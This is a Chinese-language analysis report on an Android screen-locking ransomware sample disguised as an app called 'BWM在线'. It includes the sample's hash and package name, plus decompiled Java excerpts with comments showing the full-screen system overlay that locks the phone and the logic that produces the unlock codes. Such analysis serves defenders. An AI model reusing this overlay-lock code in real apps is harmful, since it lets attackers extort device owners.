1.基本信息
病毒名称: a.privacy.fakeccb.a
文件名称: BWM在线
文件MD5: E32377EE18BF0D853D5B45DEDFB6997D
文件包名: com.qqquanquan1031606149
危害属性: 恶意勒索
2.基本行为
程序启动后直接锁屏,以勒索用户
3.详细分析
1、在入口函数内启动服务
// Excerpt from the app's entry function: looks up the service class by its
// fully qualified name and starts it. The catch clause that closes this try
// is not part of the excerpt.
try
{
// paramView holds a Class object here; the name presumably comes from the
// decompiler reusing the method's View parameter slot — TODO confirm.
paramView = Class.forName("com.qqquanquan1031606149.s"); // start the service; its class is named "s"
startService(new Intent(this, paramView));
return;
}
2、"FLAG_FULLSCREEN"、"FLAG_LAYOUT_IN_SCREEN"配合"SYSTEM_ALERT_WINDOW"权限,使这个悬浮窗全屏置顶且无法清除,造成手机屏幕无法正常使用。下面代码中的 flags = 1280 即 FLAG_FULLSCREEN(1024)与 FLAG_LAYOUT_IN_SCREEN(256)按位或的结果。
/*
 * Builds the overlay window described in the write-up: fills in a
 * WindowManager.LayoutParams, inflates a layout, adds it to the window
 * manager, and looks up the button, input field and text view inside it.
 * The excerpt is decompiler output, so framework constants appear as raw
 * integers. It stops at the setOnClickListener call; the listener body and
 * the end of the method are not shown.
 */
private void createFloatView()
{
this.wmParams = new WindowManager.LayoutParams();
Application localApplication = getApplication();
// Return value discarded; presumably a decompiler artefact.
getApplication();
this.mWindowManager = ((WindowManager)localApplication.getSystemService(Context.WINDOW_SERVICE));
// 2010 == WindowManager.LayoutParams.TYPE_SYSTEM_ERROR, a system window type
// that needs the SYSTEM_ALERT_WINDOW permission named in the write-up. The
// framework deprecates it for non-system apps from API level 26 in favour of
// TYPE_APPLICATION_OVERLAY.
this.wmParams.type = 2010;
// 1 == PixelFormat.RGBA_8888.
this.wmParams.format = 1;
// 1280 == FLAG_FULLSCREEN (1024) | FLAG_LAYOUT_IN_SCREEN (256).
this.wmParams.flags = 1280; // changed to 1280 here (author's note)
// 49 == Gravity.TOP (48) | Gravity.CENTER_HORIZONTAL (1).
this.wmParams.gravity = 49;
this.wmParams.x = 0;
this.wmParams.y = 0;
// -1 == MATCH_PARENT for both dimensions, so the view spans the whole screen.
this.wmParams.width = -1;
this.wmParams.height = -1;
// 2130903041 is a raw layout resource ID; its name is not recoverable from this excerpt.
this.mFloatLayout = LayoutInflater.from(getApplication()).inflate(2130903041, (ViewGroup)null);
this.mWindowManager.addView(this.mFloatLayout, this.wmParams);
// Raw view IDs for the button, the input field and the text view of the inflated layout.
this.bt = ((Button)this.mFloatLayout.findViewById(2131165190));
this.ed = ((EditText)this.mFloatLayout.findViewById(2131165189));
this.tv = ((TextView)this.mFloatLayout.findViewById(2131165187));
// The click listener's body is cut off in the excerpt.
this.bt.setOnClickListener(new View.OnClickListener()
3、在处理解除锁屏的密码时,作者加入了异常处理代码(try/catch),只有在触发异常后,才能够实现解锁。
// Sets the text view to the label string followed by the current value of ppss.
this.tv.setText("解锁随机码" + this.ppss); // ppss is the unlock code (per the write-up)
/*
 * Service start-up as recovered by the decompiler: draws two random numbers,
 * opens the "QQ1031606149" preferences file, and sets ppss either from the
 * value stored under key "m" (network available) or to a fixed string
 * (no network).
 *
 * NOTE(review): this is raw decompiler output and not valid Java. The label
 * "label126", the "break label126" inside a catch block and the
 * self-assignment of localException2 are decompiler artefacts, so the exact
 * control flow around the try/catch blocks cannot be confirmed from this
 * listing alone.
 */
public void onCreate()
{
    LogCatBroadcaster.start(this);
    super.onCreate();
    // Random value in [0, 10000000). No cast is shown here; since it is later
    // passed to putLong, the decompiler presumably dropped a (long) cast — TODO confirm.
    this.pass = ((Math.random() * 10000000));
    // Random int in [0, 1000000); not read anywhere else in this excerpt.
    this.passw = ((int)(Math.random() * 1000000));
    // Mode 0 == Context.MODE_PRIVATE. The preferences file name is a fixed
    // string, which makes it usable as a static indicator for this sample.
    this.share = getSharedPreferences("QQ1031606149", 0);
    this.editor = this.share.edit();
    // Author's note: checks for a network connection; when there is none,
    // ppss is assigned (further down), and ppss is the unlock code.
    if (isNetworkConnected(getApplicationContext()))
    {
        // First run with network: nothing stored under "m" yet, so persist the random value.
        if (this.share.getLong("m", 0) == 0) {
            this.editor.putLong("m", this.pass);
            this.editor.commit();
        }
        try
        {
            this.editor.commit();
            label126:
            // ppss becomes the stored value rendered as a decimal string.
            this.ppss = (this.share.getLong("m", 8) + "");
            // Thread with an empty run() as decompiled; the real body may
            // have been lost by the decompiler — TODO confirm.
            new Thread()
            {
                public void run() {}
            }.start();
            return;
        }
        catch (Exception localException1)
        {
            break label126;
        }
    }
    try
    {
        // No network: ppss is a hard-coded string.
        this.ppss = "831524";
    }
    catch (Exception localException2)
    {
        for (;;)
        {
            try
            {
                // As decompiled, password is assigned only on this
                // exception-handler path, matching the write-up's remark that
                // unlocking depends on an exception being raised.
                this.password = "第六感是我爷爷";
                return;
            }
            catch (Exception localException3) {}
            localException2 = localException2;
        }
    }
}